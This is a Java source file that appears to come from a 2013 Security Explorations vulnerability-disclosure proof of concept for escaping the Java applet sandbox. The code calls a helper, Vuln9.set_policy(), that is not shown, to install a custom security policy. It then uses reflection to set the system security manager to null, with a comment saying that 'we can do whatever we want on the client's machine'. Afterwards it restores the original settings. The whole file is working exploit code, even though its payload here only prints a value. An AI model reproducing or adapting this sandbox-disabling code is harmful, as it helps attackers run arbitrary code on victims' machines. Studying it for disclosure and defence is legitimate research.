/*## (c) SECURITY EXPLORATIONS    2013 poland                                #*/
/*##     http://www.security-explorations.com                                #*/

/* THIS SOFTWARE IS PROTECTED BY DOMESTIC AND INTERNATIONAL COPYRIGHT LAWS    */
/* UNAUTHORISED COPYING OF THIS SOFTWARE IN EITHER SOURCE OR BINARY FORM IS   */
/* EXPRESSLY FORBIDDEN. ANY USE, INCLUDING THE REPRODUCTION, MODIFICATION,    */
/* DISTRIBUTION, TRANSMISSION, RE-PUBLICATION, STORAGE OR DISPLAY OF ANY      */
/* PART OF THE SOFTWARE, FOR COMMERCIAL OR ANY OTHER PURPOSES REQUIRES A      */
/* VALID LICENSE FROM THE COPYRIGHT HOLDER.                                   */

/* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS    */
/* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,*/
/* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL    */
/* SECURITY EXPLORATIONS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, */
/* WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF  */
/* OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE     */
/* SOFTWARE.                                                                  */

import java.lang.*;
import java.lang.reflect.*;
import java.io.*;
import java.security.*;

public class Test {
 PrintWriter out;

 public void set_sm(PrintWriter out,Object sm) {
  try {
   Class c=Class.forName("java.lang.System");
   Class ctab[]=new Class[1];
   ctab[0]=Class.forName("java.lang.SecurityManager");

   Method m=c.getMethod("setSecurityManager",ctab);

   Object args[]=new Object[1];

   args[0]=sm;
   m.invoke(null,args);
  } catch(Throwable t) {
   t.printStackTrace(out);
  }
 }

 public void dowork(PrintWriter out) {
  try {
   out.println("Security manager = "+System.getSecurityManager());
  } catch(Throwable t) {
   t.printStackTrace(out);
  }
 }

 public Test(PrintWriter out) {
  try {
   this.out=out;
   out.println("Security manager = "+System.getSecurityManager());

   /* save original value of Security Manager                             */
   SecurityManager org_sm=System.getSecurityManager();

   /* set custom security Policy                                          */
   Vuln9.set_policy();

   /* set "security" field of java.lang.System class to null              */
   set_sm(out,null);

   /* from now on we can do whatever we want on the client's machine      */
   dowork(out);

   /* restore original Policy                                             */
   Policy p=Policy.getPolicy();

   Class c=p.getClass().getSuperclass();

   Field f=c.getDeclaredField("original_policy");
   f.setAccessible(true);

   Policy org_p=(Policy)f.get(p);

   Policy.setPolicy(org_p);

   /* restore original value of Security Manager                          */
   set_sm(out,org_sm);

  } catch(Throwable t) {
   t.printStackTrace(out);
  }
 }
}
